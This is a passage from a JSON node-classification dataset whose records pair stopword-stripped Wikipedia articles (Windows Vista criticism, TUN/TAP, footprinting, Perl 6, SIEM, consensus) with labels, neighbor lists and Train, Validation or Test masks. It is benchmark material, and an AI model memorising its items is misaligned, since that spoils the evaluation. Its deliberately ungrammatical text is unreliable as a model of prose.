      1611,
      2638,
      3160,
      10851,
      7269,
      5734,
      3175,
      8293,
      2155,
      623,
      8815,
      6268,
      5245,
      3197,
      11390,
      2179,
      6787,
      4742,
      7303,
      7313,
      8852,
      3230,
      6815,
      5793,
      6818,
      6821,
      5803,
      7852,
      8876,
      10413,
      9391,
      2224,
      2226,
      7858,
      6837,
      9911,
      11447,
      8890,
      4286,
      2243,
      8901,
      8390,
      2250,
      9932,
      5840,
      5329,
      8402,
      10966,
      7896,
      731,
      11487,
      11488,
      6369,
      9444,
      7911,
      10985,
      9452,
      9964,
      5358,
      1776,
      5873,
      8435,
      757,
      2805,
      4341,
      249,
      7930,
      7939,
      7941,
      1798,
      7943,
      9479,
      1801,
      780,
      10508,
      6926,
      783,
      6415,
      11539,
      8474,
      3867,
      284,
      2335,
      2339,
      7460,
      6950,
      3886,
      7983,
      10547,
      10548,
      309,
      8501,
      823,
      8502,
      5948,
      11068,
      8514,
      10051,
      11075,
      4423,
      7504,
      7505,
      9044,
      344,
      7515,
      8539,
      2398,
      1376,
      868,
      3945,
      8553,
      7019,
      10089,
      10603,
      4465,
      10612,
      3446,
      1399,
      3960,
      7033,
      1402,
      7552,
      3457,
      3470,
      5518,
      407,
      7576,
      409,
      3488,
      11681,
      10658,
      9126,
      10669,
      1967,
      2480,
      6063,
      11184,
      2995,
      10675,
      1461,
      1463,
      10680,
      1469,
      4030,
      9151,
      10173,
      9665,
      453,
      8136,
      4553,
      9677,
      466,
      1499,
      6109,
      1502,
      7134,
      5090,
      995,
      7653,
      10220,
      10733,
      10734,
      6639,
      499,
      4596,
      2035,
      10746,
      9723,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 11605,
    "label": 2,
    "text": "Criticism_of_Windows_Vista:criticism windows vista windows vista operating system released microsoft consumers january 30 2007 widely criticized reviewers users due issues new security features performance driver support product activation windows vista subject number negative assessments various groups security reasons 64-bit versions windows vista windows 7 well allow signed drivers installed kernel mode code executing kernel mode enjoys wide privileges system signing requirement aims ensure code known origin execute level order driver signed developer/software vendor obtain authenticode certificate sign driver authenticode certificates obtained certificate authorities trusted microsoft microsoft trusts certificate authority verify applicant identity issuing certificate driver signed using valid certificate driver signed using certificate revoked microsoft certificate authority windows refuse load driver following criticisms/claims made regarding requirement microsoft allows developers temporarily locally disable signing requirement systems control hitting f8 boot signing drivers self-issued certificates running kernel debugger one time third-party tool called atsiv existed would allow driver unsigned signed loaded atsiv worked installing signed surrogate driver could directed load driver thus circumventing driver signing requirement since violation driver signing requirement microsoft closed workaround hotfix kb932596 revoking certificate surrogate driver signed security researchers alexander sotirov mark dowd developed technique bypasses many new memory-protection safeguards windows vista address space layout randomization aslr result already existing buffer overflow bugs vista previously exploitable due features may exploitable vulnerability sotirov notes presented weaknesses protection mechanism still requires system attack vulnerability without presence vulnerability techniques ’ really accomplish anything vulnerability sotirov dowd used paper example 2007 animated cursor bug cve-2007-0038 one security researcher dino dai zovi claimed means completely game vista security though sotirov refuted saying articles describe vista security 'broken 'done 'unfixable vulnerabilities completely inaccurate one suggestions saw many discussions people use windows xp fact xp lot protections ’ bypassing aslr ’ even exist another common criticism concerns integration new form digital rights management drm operating system specifically protected video path pvp involves technologies high-bandwidth digital content protection hdcp image constraint token ict features added vista due licensing restrictions hd-dvd consortium blu-ray association concern resolution playback protected content hd dvd blu-ray discs enabled 2012 lack protected channel stop playback audio plays back normal high-definition video downsamples blu-ray hd dvd slightly-better-than-dvd quality video protected video path mandates encryption must used whenever content marked protected travel link might intercepted called user-accessible bus uab additionally devices come contact premium content graphics cards certified microsoft playback starts devices involved checked using hardware functionality scan hfs verify genuine tampered devices required lower resolution 1920×1080 960×540 video signals outputs protected hdcp additionally microsoft maintains global revocation list devices compromised list distributed pcs internet using normal update mechanisms effect revoked driver functionality high-level protected content play functionality including low-definition playback retained peter gutmann computer security expert university auckland new zealand released whitepaper raises following concerns mechanisms free software foundation conducted campaign called badvista vista grounds ed bott author windows vista inside published three-part blog rebuts many gutmann claims bott criticisms summarized follows technology writer george ou states gutmann paper relies unreliable sources gutmann never used windows vista test theories gutmann responded bott ou article states central thesis gutmann article refuted response bott disinformation microsoft published blog entry twenty questions answers windows vista content protection refutes gutmann arguments microsoft mvp paul smith written response gutmann paper counters arguments specifically says microsoft also noted content protection mechanisms existed windows far back windows around time release microsoft stated nearly pcs market today run windows vista pcs sold 2005 capable running vista hardware worked windows xp work works poorly vista vista-compatible drivers available due companies going business lack interest supporting old hardware tom hardware published benchmarks january 2007 showed windows vista executed typical applications slowly windows xp hardware configuration subset benchmarks used provided standard performance evaluation corporation spec later stated results compared generated running windows xp even testing done hardware configuration spec acknowledges apple-to-apples comparison made cases one done tom hardware calling studies invalid comparisons however tom hardware report conceded specviewperf tests suffered heavily lack support opengl graphics library windows vista reason report recommended replacing windows xp vista manufacturers made drivers available report also concluded tests involving real world applications vista performed considerably slower noting disappointed cpu-intensive applications video transcoding xvid dvd xvid mpeg4 mainconcept h.264 encoder performed 18 nearly 24 slower standard benchmark scenarios commonly used applications including photoshop winrar also performed worse vista many low-to-mid-end machines come windows vista pre-installed suffer exceptionally slow performance default vista settings come pre-loaded laptop manufacturers offered downgrade laptops windows xp—for price however price unnecessary microsoft allows users windows vista windows 7 freely downgrade software installing xp phoning microsoft representative new product key first released november 2006 vista performed file operations copying deletion slowly operating systems large copies required migrating one computer another seemed difficult impossible without workarounds using command line inability efficiently perform basic file operations attracted strong criticism six months microsoft confirmed existence problems releasing special performance reliability update later disseminated windows update included service pack 1 nonetheless one benchmark reported show improving performance compared vista original release service pack 1 increase level performance windows xp however benchmark questioned others within zdnet ed bott questions colleagues methods provides benchmarks refute results early vista lifecycle many games showed drop frame rate compared windows xp results largely consequence vista immature drivers graphics cards higher system requirements vista time service pack 1 released mid-2008 gaming benchmarks showed vista par windows xp however games devil may cry 4 crysis left 4 dead stated memory requirements vista 1.5x 2x higher xp concerns expressed windows vista may contain software bloat speaking 2007 university illinois microsoft distinguished engineer eric traut said lot people think windows large bloated operating system maybe fair characterization admit went say core kernel components make core operating system actually pretty streamlined former pc world editor ed bott expressed skepticism claims bloat noting almost every single operating system microsoft ever sold criticized bloated first came even regarded exact opposite ms-dos two consumers sued microsoft united states federal court alleging windows vista capable marketing campaign bait-and-switch tactic computers windows xp pre-installed could run vista basic sometimes even running user-acceptable speed february 2008 seattle judge granted suit class action status permitting purchasers class participate case released documents case well dell presentation march 2007 discussed late changes windows vista permitted hardware certified would require upgrading order use vista lack compatible drivers forced hardware vendors limp issues vista launched one several vista launch appraisals included 158 pages unsealed documents new features vista criticism surfaced concerning use battery power laptops running vista drain battery much rapidly windows xp reducing battery life windows aero visual effects turned battery life equal better windows xp systems release new operating system new features higher requirements higher power consumption normal richard shim analyst idc noted windows xp came true windows 2000 came true according gartner vista dogged fears cases proven many existing applications re-written operate new system cisco reported saying vista solve lot problems every action reaction unforeseen side-effects mutations networks become brittle according pc world software compatibility issues bug worries keep businesses moving microsoft new os citing concerns cost compatibility united states department transportation prohibited workers upgrading vista university pittsburgh medical center said rollout vista significantly behind schedule several key programs still n't compatible including patient scheduling software july 2007 2,000 tested applications compatible vista microsoft published list legacy applications meet works windows vista software standards well list applications meet stringent certified windows vista standards microsoft released application compatibility toolkit 5.0 application migrating vista-incompatible applications virtualization solutions like virtualbox virtual pc 2007 vmware also used last resort continue running vista-incompatible applications legacy versions windows microsoft also provides upgrade advisor tool .net framework must installed internet connection required used existing xp systems flag driver application compatibility issues upgrading vista microsoft also criticized removing heavily discussed features next-generation secure computing base may 2004 winfs august 2004 windows powershell august 2005 though released separately vista prior vista release included vista successor windows 7 securid support may 2006 pc-to-pc synchronization june 2006 initial three pillars vista radically altered reach release date microsoft international pricing vista criticized many expensive differences pricing one country another vary significantly especially considering copies vista ordered shipped worldwide united states could save 42 €26 314 €200 many cases difference price significantly greater case windows xp malaysia pricing vista around rm799 244/€155 current exchange rate united kingdom consumers could paying almost double united states counterparts software since release windows vista january 2007 microsoft reduced retail upgrade price point vista originally vista ultimate full retail priced 399 upgrade 259 prices since reduced 319 219 respectively vista includes enhanced set anti-copying technologies based windows xp windows genuine advantage called software protection platform spp initial release windows vista without service pack 1 spp included reduced-functionality mode system enters detects user failed product activation copy vista identified counterfeit non-genuine microsoft white paper described technology follows analysts questioned behavior especially given imperfect false-positive record behalf spp predecessor given least one temporary validation server outage reportedly flagged many legitimate copies vista xp non-genuine windows update would check fail validation challenge microsoft altered spp significantly windows vista service pack 1 instead reduced-functionality mode installations vista left unactivated 30 days present users nag screen prompts activate operating system log change desktop solid black colour every hour periodically use notification balloons warn users software counterfeiting addition updates classified optional available unactivated copies vista microsoft maintains technical bulletin providing details product activation vista windows vista ultimate users download exclusive windows ultimate extras extras released much slowly expected four available august 2009 almost three years vista released angered users paid extra mainly promised add-ons barry goffe director windows vista ultimate microsoft states unexpectedly delayed releasing several extras microsoft plans ship collection additional windows ultimate extras confident delight passionate windows vista ultimate customers term coined disparaging substitute proper name vista operating system use term popularized use secret diary steve jobs technology pop culture comedic blog author daniel lyons writes persona apple ceo steve jobs use reference failure vista meet sales customer satisfaction expectations lyons published article forbes using term soon picked international media outlets jornal de notícias rádio e televisão de portugal la nación chosun ilbo 163.com",
    "neighbors": [
      6150,
      6153,
      11283,
      3605,
      5666,
      11301,
      1577,
      6697,
      1581,
      7215,
      1077,
      8757,
      5176,
      582,
      1098,
      9812,
      8798,
      4704,
      10338,
      8296,
      617,
      5225,
      8299,
      622,
      7796,
      6265,
      8315,
      636,
      639,
      641,
      651,
      6797,
      10896,
      2196,
      2709,
      10900,
      3224,
      7838,
      8865,
      6827,
      2221,
      3250,
      9910,
      7359,
      4289,
      194,
      2244,
      8391,
      10957,
      4816,
      3283,
      3289,
      4316,
      740,
      9448,
      2282,
      10989,
      7409,
      259,
      4356,
      11524,
      782,
      8976,
      3857,
      11030,
      11549,
      7456,
      9505,
      7970,
      3875,
      11559,
      1832,
      6441,
      7983,
      3890,
      11060,
      823,
      6972,
      6462,
      11584,
      321,
      9033,
      6476,
      2391,
      4439,
      11103,
      2919,
      9585,
      1400,
      1916,
      894,
      8576,
      3463,
      5004,
      1935,
      8080,
      4505,
      928,
      929,
      10658,
      4515,
      11175,
      3496,
      7615,
      7106,
      3527,
      9166,
      4051,
      9173,
      11221,
      5600,
      8681,
      4074,
      2027,
      5103,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11606,
    "label": 2,
    "text": "TUN/TAP:tun/tap computer networking tun tap virtual network kernel interfaces network devices supported entirely software differ ordinary network devices backed hardware network adapters universal tun/tap driver originated 2000 merger corresponding drivers solaris linux bsd driver continues maintained part linux freebsd kernels though similar tunneling purposes one time used tun tap apply different layers network stack tun namely network tunnel simulates network layer device operates carrying ip packets tap namely network tap simulates link layer device operates carrying ethernet frames tun used routing tap used creating network bridge packets sent operating system via tun/tap device delivered user-space program attaches device user-space program may also pass packets tun/tap device case tun/tap device delivers injects packets operating-system network stack thus emulating reception external source platforms tun/tap drivers include",
    "neighbors": [
      10631,
      9868,
      6797,
      9722,
      8211,
      10005,
      11413,
      11162,
      3742,
      10016,
      9764,
      3879,
      7722,
      4268,
      10924,
      7983,
      10417,
      7859,
      2228,
      8499,
      823,
      3777,
      2884,
      8265,
      11468,
      7376,
      11221,
      2136,
      6364,
      5084,
      5470,
      5472,
      10210,
      10851,
      9318,
      8039,
      1513,
      11248,
      5749,
      8439,
      3322,
      4734
    ],
    "mask": "None"
  },
  {
    "node_id": 11607,
    "label": 4,
    "text": "Footprinting:footprinting footprinting also known reconnaissance technique used gathering information computer systems entities belong get information hacker might use various tools technologies information useful hacker trying crack whole system used computer security lexicon footprinting generally refers one pre-attack phases tasks performed actual attack tools used footprinting sam spade nslookup traceroute nmap neotrace allows hacker gain information target system information used carry attacks system reason may named pre-attack since information reviewed order get complete successful resolution attack crawling process surfing internet get required information target sites surfed include target ’ website blogs social networks information obtained method helpful methods.crawling whois web application used get information target website administrator e-mail address details registration whois large database contains information approximately websites searched domain name search engines google also used gather information target system depends well one knows use search engines collect information used properly attacker gather lots information company career policies etc information also gathered using command tracert traceroute used trace path user target system networks way becomes clear request forwarded devices linux systems tracepath traceroute commands also available traceroute operations negative web search reveal websites performed target website negative websites act resources insight flaws target website attack performed company following information gathered basics footprinting",
    "neighbors": [
      5665,
      2887,
      8204,
      7983,
      11249,
      2739,
      119,
      8692,
      11092,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 11608,
    "label": 2,
    "text": "DYNIX:dynix dynix dynamic unix unix-like operating system developed sequent computer systems based 4.2bsd modified run intel-based symmetric multiprocessor hardware third major dynix 3.0 version released may 1987 1992 dynix succeeded dynix/ptx based unix system v. ibm obtained rights dynix/ptx 1999 acquired sequent 810 million ibm subsequent project monterey attempt circa 1999 unify aix sequent dynix/ptx operating system unixware 2001 however explosion popularity linux ... prompted ibm quietly ditch version named dynix 4.1.4",
    "neighbors": [
      6787,
      6412,
      5397,
      1304,
      3487,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      7992,
      9151,
      10436,
      6369,
      5492,
      2424,
      633
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11609,
    "label": 4,
    "text": "American_Innovation_and_Competitiveness_Act:american innovation competitiveness act american innovation competitiveness act aica united states federal law enacted 2017 act updated instructions national science foundation national institute standards technology nist conduct support research cybersecurity cryptography created director security nist revised program requirements networking information technology research development program coordinates advanced computer research across u.s. government agencies assigned office management budget responsibility create interagency working group reduce administrative burdens federally-funded researchers act authorizes creation interagency advisory panel working groups consider education science technology engineering mathematics stem fields act supports coordination citizen science crowdsourcing federal agencies accomplish missions",
    "neighbors": [
      3552,
      612,
      5636,
      7979,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11610,
    "label": 9,
    "text": "Perl_6:perl 6 perl 6 also known raku member perl family programming languages historically several interpreter compiler implementations written today rakudo perl 6 implementation active development introducing elements many modern historical languages compatibility perl 5 goal though compatibility mode part specification design process perl 6 began 2000 february 2015 post perl foundation blog stated perl6 team attempt get development release version 1.0 available larry birthday september version 1.0 release christmas 25 december 2015 first stable version specification announced development pugs first high-traction implementation began 2005 multiple perl 6 implementation projects rakudo perl 6 based nqp quite perl use moarvm java virtual machine runtime environment releases new version every month including precompiled gnu/linux packages july 2010 project released first rakudo star distribution collection perl 6 implementation related materials larry wall maintains reference grammar known std.pm6 written perl 6 bootstrapped perl 5 perl 6 design process first announced 19 july 2000 fourth day year perl conference larry wall state onion 2000 talk time primary goals remove historical warts language easy things stay easy hard things get easier impossible things get hard general cleanup internal design apis process began series requests comments rfcs process open contributors left aspect language closed change rfc process complete wall reviewed classified request 361 received began process writing several apocalypses term means revealing original goal write one apocalypse chapter programming perl became obvious apocalypse written previous apocalypses invalidated later changes reason set synopses published one relating contents apocalypse subsequent changes reflected updates today perl 6 specification continues almost entirely within synopses also series exegeses written damian conway explain content apocalypse terms practical usage exegesis consists code examples along discussion usage implications examples three primary methods communication used development perl 6 today first irc channel freenode second set mailing lists perl foundation servers perl.org third git source code repository hosted https //github.com/perl6 break compatibility mandated start project immediately allowed changes larry wall suggested initial speech historical warts confusion surrounding sigil usage containers ambiguity codice_1 functions syntactic impact bareword filehandles many problems perl programmers discussed fixing years first issues addressed years perl 6 undergone several alterations direction introduction concepts python ruby early influences pugs interpreter written haskell programming language many functional programming influences absorbed perl 6 design team language mascot camelia perl 6 bug name nod camel mascot associated perl form pun-loving tradition perl community play software bug spiral designs embedded butterfly-like wings resemble characters p6 favored nickname perl 6 off-center eye placement intentional pun wall-eyed one goals behind lively colorful design logo discourage misogyny community opportunity masculine persuasion show sensitive side rakudo perl 6 implementation active development implementation designated official perl 6 implementation rather perl 6 anything passes official test suite rakudo perl 6 targets number virtual machines moarvm java virtual machine javascript moarvm virtual machine built especially rakudo perl 6 nqp compiler toolchain layer perl 6 virtual machines called quite perl 6 nqp implements perl 6 rules parsing perl 6 well abstract syntax tree backend-specific code generation large portions rakudo written perl 6 subset nqp rakudo completely self-hosting implementation concrete plans point make rakudo bootstrapping compiler pugs initial implementation perl 6 written haskell pugs used advanced implementation perl 6 since mid 2007 mostly dormant updates made track current version ghc november 2014 pugs actively maintained 2007 v6-miniperl6 mp6 reimplementation v6-kindaperl6 kp6 written means bootstrap perl-6.0.0 std using perl 5 std full grammar perl 6 written perl 6 theory anything capable parsing std generating executable code suitable bootstrapping system perl 6. kp6 currently compiled mp6 work multiple backends mp6 kp6 full perl 6 implementations designed implement minimum featureset required bootstrap full perl 6 compiler yapsi perl 6 compiler runtime written perl 6 result requires existing perl 6 interpreter one rakudo star releases order run niecza another major perl 6 implementation effort focused optimization efficient implementation research targets common language infrastructure perl 6 specification requests modules identified name version authority possible load specific version module even two modules name differ version authority convenience aliasing short name provided cpan perl 5 module distribution system yet handle perl 6 modules instead prototype module system use perl 5 perl 6 differ fundamentally though general intent keep perl 6 perl perl 6 clearly perl programming language changes intended normalize language make easier novice expert programmers alike understand make easy things easier hard things possible major non-technical difference perl 5 perl 6 perl 6 began specification means perl 6 re-implemented needed also means programmers n't read source code ultimate authority given feature perl 5 documentation regarded excellent even outside perl community even mixed reviews typically note maturity breadth however documentation considered authoritative describes behavior actual perl 5 interpreter informally discrepancies found documentation implementation may lead either changed reflect dynamic drives continuing development refinement perl 5 releases perl 6 dynamic type system perl 5 augmented addition static types example however static typing remains optional programmers things without explicit typing perl 6 offers gradual typing system whereby programmer may choose use static typing use dynamic typing mix two perl 5 defines subroutines without formal parameter lists though simple parameter counting loose type checking done using perl 5 prototypes subroutine arguments passed aliased elements array elements modified changes reflected original data perl 6 introduces true formal parameters language perl 6 subroutine declaration looks like perl 5 formal parameters i.e. variables parameter list aliases actual parameters values passed default aliases constant modified may declared explicitly read-write aliases original value copies using codice_2 codice_3 directives programmer require modified locally perl 6 provides three basic modes parameter passing positional parameters typical ordered list parameters programming languages use parameters may also passed using name unordered way named-only parameter passed specifying name never captures positional argument indicated leading codice_4 character slurpy parameters indicated codice_5 parameter name perl 6 tool creating variadic functions slurpy hash capture remaining passed-by-name parameters whereas slurpy array capture remaining passed-by-position parameters example use three parameter-passing modes positional parameters used always required unless followed codice_6 indicate optional named parameters optional default may marked required adding codice_7 variable name slurpy parameters always optional parameters also passed arbitrary blocks act closures example codice_8 codice_9 loop iterators named following example list traversed 3 elements time passed loop block variables codice_10 generally referred pointy sub pointy block arrow behaves almost exactly like codice_11 keyword introducing anonymous closure anonymous subroutine perl 5 terminology perl 5 sigils – punctuation characters precede variable name – change depending variable used perl 6 sigils invariant means change based whether array array element needed variance perl 5 inspired number agreement english many natural languages however conceptual mapping breaks references come play since may refer data structures even though scalars thus dealing nested data structures may require expression singular plural form single term complexity equivalent either common use natural language programming languages causes high cognitive load writing code manipulate complex data structures compare perl 6 perl 5 supports object-oriented programming via mechanism known blessing reference blessed object particular class blessed object methods invoked using arrow syntax cause perl locate dispatch appropriate subroutine name call blessed variable first argument extremely powerful makes common case object orientation struct-like object associated code unnecessarily difficult addition perl make assumptions object model use method invocation optimized well spirit making easy things easy hard things possible perl 6 retains blessing model supplies robust object model common cases example class encapsulate cartesian point could defined used way dot replaces arrow nod many languages e.g java python etc coalesced around dot syntax method invocation terminology perl 6 codice_12 called attribute languages call fields members method used access attribute called accessor auto-accessors methods created automatically method codice_13 example accessor functions return value attribute class individual attribute declared codice_2 modifier short read/write auto-accessor passed new value set attribute directly assigned lvalue example auto-accessors replaced user-defined methods programmer desire richer interface attribute attributes accessed directly within class definition access must go accessor methods perl 6 object system inspired moose framework introduces many perl 6 oop features perl 5 roles perl 6 take function interfaces java mixins ruby traits smalltalk variant squeak much like classes provide safer composition mechanism used perform composition used classes rather adding inheritance chain roles define nominal types provide semantic names collections behavior state fundamental difference role class classes instantiable roles essentially role bundle possibly abstract methods attributes added class without using inheritance role even added individual object case perl 6 create anonymous subclass add role subclass change object class anonymous subclass example dog mammal dogs inherit certain characteristics mammals mammary glands mammal parent vertebrate backbone dogs may one several distinct types behavior example dog may pet stray guide blind however simply sets additional behaviors added dog cat equally pet stray example hence dog mammal classes pet stray guide roles roles added class object codice_15 keyword opposed inheritance codice_16 keywords reflect differing meanings two features role composition gives class behavior role n't indicate truly thing role although roles distinct classes types role appear variable declaration one would normally put class example blind role human could include attribute type guide attribute could contain guide dog guide horse guide human even guide machine perl regular expression string-processing support always one defining features since perl pattern-matching constructs exceeded capabilities regular language expressions time perl 6 documentation exclusively refer regexen distancing term formal definition perl 6 provides superset perl 5 features respect regexes folding larger framework called rules provide capabilities context-sensitive parsing formalisms syntactic predicates parsing expression grammars antlr well acting closure respect lexical scope rules introduced codice_17 keyword usage quite similar subroutine definition anonymous rules also introduced codice_18 codice_19 keyword simply used inline regexps perl 5 via codice_20 matching codice_21 substitute operators apocalypse 5 larry wall enumerated 20 problems current regex culture among perl regexes compact 'cute much reliance metacharacters little support named captures little support grammars poor integration 'real language perl 5 constructs changed perl 6 optimized different syntactic cues common cases example parentheses round brackets required control flow constructs perl 5 optional also codice_22 comma operator list constructor enclosing parentheses longer required around lists code makes codice_23 array exactly elements 1 2 3 4 perl 6 allows comparisons chain sequence comparisons following allowed treated left-to-right comparison performed result logically combined via codice_24 operation perl 6 uses technique lazy evaluation lists feature functional programming languages haskell code crash attempting assign list infinite size array codice_25 hang indefinitely attempting expand list limited number slots searched simplifies many common tasks perl 6 including input/output operations list transformations parameter passing related lazy evaluation construction lazy lists using codice_26 codice_27 behaving somewhat like generators languages like icon python codice_28 infinite list square numbers lazy evaluation codice_26 ensures elements computed accessed perl 6 introduces concept junctions values composites values simplest form junctions created combining set values junctive operators codice_30 indicates value equal either left right-hand arguments codice_31 indicates value equal left right-hand arguments values used code would use normal value operations performed junction act members junction equally combine according junctive operator codice_32 would yield codice_33 comparisons junctions return single true false result comparison codice_34 junctions return true comparison true one elements junction codice_35 junctions return true comparison true elements junction junctions also used richly augment type system introducing style generic programming constrained junctions types low-level languages concept macros become synonymous textual substitution source-code due widespread use c preprocessor however high-level languages lisp pre-dated c use macros far powerful lisp-like macro concept perl 6 take advantage power sort macro stems fact operates program high-level data structure rather simple text full capabilities programming language disposal perl 6 macro definition look like subroutine method definition operate unparsed strings ast representing pre-parsed code combination two macro definition would look like particular example macro complex c-style textual substitution parsing macro parameter occurs macro operates calling code diagnostic messages would far informative however body macro executed compile time time used many techniques optimization employed even possible entirely eliminate complex computations resulting programs performing work compile-time perl 5 identifier names use ascii alphanumerics underscores also available languages perl 6 alphanumerics include unicode characters addition hyphens apostrophes used certain restrictions followed digit using hyphens instead underscores separate words name leads style coding called kebab-casing highly regarded two-finger typists hello world program common program used introduce language perl 6 hello world — though one way factorial function perl 6 defined different ways quicksort well-known sorting algorithm working implementation using functional programming paradigm succinctly written perl 6 tower hanoi often used introduce recursive programming computer science implementation uses perl 6 multi-dispatch mechanism parametric constraints history perl 6 two waves book writing first wave followed initial announcement perl 6 2000 books reflect state design language time contain mostly outdated material today second wave followed announcement version 1.0 2015 includes several books already published others process writing also book dedicated one first perl 6 virtual machine parrot published 2009 reports different authors new books going published soon based current version 1.0 known version 6.c perl 6",
    "neighbors": [
      5249,
      9345,
      5251,
      5253,
      3462,
      8582,
      6536,
      1673,
      9224,
      1931,
      8973,
      10510,
      5521,
      9875,
      3988,
      3733,
      5399,
      2585,
      11674,
      155,
      9245,
      10013,
      1952,
      8611,
      3876,
      4777,
      6313,
      11307,
      5677,
      4398,
      7983,
      9014,
      3767,
      9914,
      6335,
      3137,
      963,
      10819,
      4294,
      8262,
      5961,
      5330,
      11219,
      5588,
      7764,
      4057,
      10586,
      7518,
      11492,
      4069,
      1382,
      9701,
      2281,
      8554,
      11625,
      5612,
      8941,
      9714,
      1016,
      11135
    ],
    "mask": "Train"
  },
  {
    "node_id": 11611,
    "label": 4,
    "text": "Security_information_and_event_management:security information event management field computer security security information event management siem software products services combine security information management sim security event management sem provide real-time analysis security alerts generated applications network hardware vendors sell siem software appliances managed services products also used log security data generate reports compliance purposes term initialism siem coined mark nicolett amrit williams gartner 2005 acronyms sem sim siem sometimes used interchangeably generally refer different primary focus products practice many products area mix functions often overlap – many commercial vendors also promote terminology often times commercial vendors provide different combinations functionalities tend improve siem overall log management alone ’ provide real-time insights network security sem wo n't provide complete data deep threat analysis sem log management combined information available siem monitor key focus monitor help manage user service privileges directory services system-configuration changes well providing log auditing review incident response many meanings definitions capabilities evolving requirements continually shape derivatives siem product-categories need voice-centric visibility vsiem voice security information event management provides recent example evolution computer security researcher chris kubecka identified following siem use cases presented hacking conference 28c3 chaos communication congress examples customized rules alert event conditions involve user authentication rules attacks detected infections detected",
    "neighbors": [
      11542,
      8343,
      6559,
      6560,
      34,
      2090,
      10539,
      1453,
      2733,
      184,
      5433,
      7352,
      7739,
      1980,
      10940,
      2889,
      10574,
      4689,
      10196,
      8533,
      1111,
      9688,
      10331,
      3552,
      612,
      3944,
      2539,
      111,
      4471,
      5245,
      2558,
      7295
    ],
    "mask": "Test"
  },
  {
    "node_id": 11612,
    "label": 3,
    "text": "Consensus_(computer_science):consensus computer science fundamental problem distributed computing multi-agent systems achieve overall system reliability presence number faulty processes often requires processes agree data value needed computation examples applications consensus include whether commit transaction database agreeing identity leader state machine replication atomic broadcasts real world applications include clock synchronization pagerank opinion formation smart power grids state estimation control uavs multiple robots/agents general load balancing blockchain others consensus problem requires agreement among number processes agents single data value processes agents may fail unreliable ways consensus protocols must fault tolerant resilient processes must somehow put forth candidate values communicate one another agree single consensus value consensus problem fundamental problem control multi-agent systems one approach generating consensus processes agents agree majority value context majority requires least one half available votes process given vote however one faulty processes may skew resultant outcome consensus may reached reached incorrectly protocols solve consensus problems designed deal limited numbers faulty processes protocols must satisfy number requirements useful instance trivial protocol could processes output binary value 1 useful thus requirement modified output must somehow depend input output value consensus protocol must input value process another requirement process may decide upon output value decision irrevocable process called correct execution experience failure consensus protocol tolerating halting failures must satisfy following properties variations definition integrity may appropriate according application example weaker type integrity would decision value equal value correct process proposed – necessarily integrity condition also known validity literature protocol correctly guarantee consensus amongst n processes fail said t-resilient evaluating performance consensus protocols two factors interest running time message complexity running time given big notation number rounds message exchange function input parameters typically number processes and/or size input domain message complexity refers amount message traffic generated protocol factors may include memory usage size messages varying models computation may define consensus problem models may deal fully connected graphs others may deal rings trees models message authentication allowed whereas others processes completely anonymous shared memory models processes communicate accessing objects shared memory also important area research models communication protocol participants communicate authenticated channels means messages anonymous receivers know source every message receive models assume stronger form authentication message signed sender receiver knows immediate source every message participant initially created message stronger type authentication achieved digital signatures stronger form authentication present protocols tolerate larger number faults two different authentication models often called oral communication written communication models oral communication model immediate source information known whereas stronger written communication models every step along receiver learns immediate source message communication history message special case consensus problem called binary consensus restricts input hence output domain single binary digit 0,1 two types failures process may undergo crash failure byzantine failure crash failure occurs process abruptly stops resume byzantine failure failures absolutely conditions imposed example may occur result malicious actions adversary process experiences byzantine failure may send contradictory conflicting data processes may sleep resume activity lengthy delay two types failures byzantine failures far disruptive thus consensus protocol tolerating byzantine failures must resilient every possible error occur stronger version consensus tolerating byzantine failures given strengthening integrity constraint consensus problem may considered case asynchronous synchronous systems real world communications often inherently asynchronous practical often easier model synchronous systems given asynchronous systems naturally involve issues synchronous ones synchronous systems assumed communications proceed rounds one round process may send messages requires receiving messages processes manner message one round may influence messages sent within round fully asynchronous message-passing distributed system one process may crash failure proved consensus impossible however impossibility result derives worst-case scenario process schedule highly unlikely reality process scheduling degree randomness asynchronous model forms failures handled synchronous consensus protocol instance loss communication link may modelled process suffered byzantine failure three agreement problems interest follows collection formula_5 processes numbered formula_6 formula_7 communicate sending messages one another process formula_6 must transmit value formula_1 processes also known general problem formal requirements consensus protocol may include n processes partially synchronous system system alternates good bad periods synchrony process chooses private value processes communicate rounds determine public value generate consensus vector following requirements shown variations problems equivalent solution problem one type model may solution another problem another type model example solution weak byzantine general problem synchronous authenticated message passing model leads solution weak interactive consistency interactive consistency algorithm solve consensus problem process choose majority value consensus vector consensus value t-resilient anonymous synchronous protocol solves byzantine generals problem formula_14 weak byzantine generals case number failures n number processes systems formula_5 processors formula_16 byzantine shown exists algorithm solves consensus problem formula_17 oral-messages model proof constructed first showing impossibility three-node case formula_18 using result argue partitions processors written-messages model protocols tolerate formula_19 fully asynchronous system consensus solution tolerate one crash failures even requiring non triviality property result sometimes called flp impossibility proof named authors michael j. fischer nancy lynch mike paterson awarded dijkstra prize significant work flp result state consensus never reached merely model assumptions algorithm always reach consensus bounded time practice highly unlikely occur example polynomial time binary consensus protocol tolerates byzantine failures phase king algorithm garay berman algorithm solves consensus synchronous message passing model n processes f failures provided n 4 f phase king algorithm f 1 phases 2 rounds per phase process keeps track preferred output initially equal process input value first round phase process broadcasts preferred value processes receives values processes determines value majority value count second round phase process whose id matches current phase number designated king phase king broadcasts majority value observed first round serves tie breaker process updates preferred value follows count majority value process observed first round greater n /2 f process changes preference majority value otherwise uses phase king value end f 1 phases processes output preferred values google implemented distributed lock service library called chubby chubby maintains lock information small files stored replicated database achieve high availability face failures database implemented top fault-tolerant log layer based paxos consensus algorithm scheme chubby clients communicate paxos master order access/update replicated log i.e. read/write files bitcoin uses proof work maintain consensus peer-to-peer network nodes bitcoin network attempt solve cryptographic proof-of-work problem probability finding solution proportional computational effort hashes per second expended node solves problem version block transactions added peer-to-peer distributed timestamp server accepted nodes node network attempt solve proof-of-work problem sybil attack becomes unfeasible unless attacker 50 computational resources network many peer-to-peer online real-time strategy games use modified lockstep protocol consensus protocol order manage game state players game game action results game state delta broadcast players game along hash total game state player validates change applying delta game state comparing game state hashes hashes agree vote cast players whose game state minority disconnected removed game known desync another well-known approach called msr-type algorithms used widely computer science control theory solve consensus problem shared-memory system concurrent objects 